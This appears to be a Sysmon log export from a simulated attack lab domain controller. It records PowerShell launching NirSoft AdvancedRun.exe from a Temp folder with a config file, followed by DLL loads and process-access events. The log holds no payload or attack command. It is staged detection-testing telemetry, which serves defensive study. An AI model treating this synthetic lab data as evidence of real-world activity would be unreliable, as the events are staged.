18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004011372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 

Sysmon events, channel Microsoft-Windows-Sysmon/Operational, computer win-dc-mhaag-attack-range-139.attackrange.local, 2022-01-21. Field names follow the Sysmon event schema for each Event ID (schema Version 3 for Event IDs 5, 7 and 10, Version 5 for Event ID 1). Every record has Level=4, Opcode=0, Keywords=0x8000000000000000, RuleName=- and Task equal to its Event ID. Records are grouped by Event ID below; EventRecordID gives the original order (newest first in the export).

Event ID 1 (process create), record 4011370, UtcTime 2022-01-21 18:44:38.724
  ProcessGuid={834264DD-FF16-61EA-CD05-000000002702}; ProcessId=5216
  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  FileVersion=1.50; Description=Run a program with different settings that you choose.; Product=AdvancedRun; Company=NirSoft; OriginalFileName=AdvancedRun.exe
  CommandLine="C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg
  CurrentDirectory=C:\Users\Administrator\; User=ATTACKRANGE\Administrator
  LogonGuid={834264DD-DB10-61EA-4958-090000000000}; LogonId=0x95849; TerminalSessionId=2; IntegrityLevel=High
  Hashes=MD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8
  ParentProcessGuid={834264DD-E497-61EA-F301-000000002702}; ParentProcessId=944
  ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ; ParentUser=ATTACKRANGE\Administrator

Event ID 5 (process terminated), record 4011242, UtcTime 2022-01-21 18:44:36.645
  ProcessGuid={834264DD-FF07-61EA-C905-000000002702}; ProcessId=3120; Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe; User=ATTACKRANGE\Administrator

Event ID 10 (process access) records. On every one of them the target is the AdvancedRun.exe process that record 4011242 shows terminating: TargetProcessGUID={834264DD-FF07-61EA-C905-000000002702}; TargetProcessId=3120; TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe; TargetUser=ATTACKRANGE\Administrator. In every record the source is a system component (Explorer.EXE, taskhostw.exe, svchost.exe, lsass.exe) and AdvancedRun.exe is the process being opened, not the one doing the opening; note in particular that lsass.exe appears only as SourceImage, with GrantedAccess=0x1000. SourceProcessId and SourceThreadId were run together in the export and are split here on the 4-byte alignment Windows uses for both IDs.

record 4011234, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011233, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011232, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011231, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011230, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011229, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011228, UtcTime 2022-01-21 18:44:35.145; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011127, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011126, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011125, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5656; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011124, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5304; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011123, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5656; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011121, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5656; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011119, UtcTime 2022-01-21 18:44:23.930; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5656; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011118, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB10-61EA-9000-000000002702}; SourceProcessId=3336; SourceThreadId=5092; SourceImage=C:\Windows\System32\taskhostw.exe; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011117, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB10-61EA-9000-000000002702}; SourceProcessId=3336; SourceThreadId=5092; SourceImage=C:\Windows\System32\taskhostw.exe; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

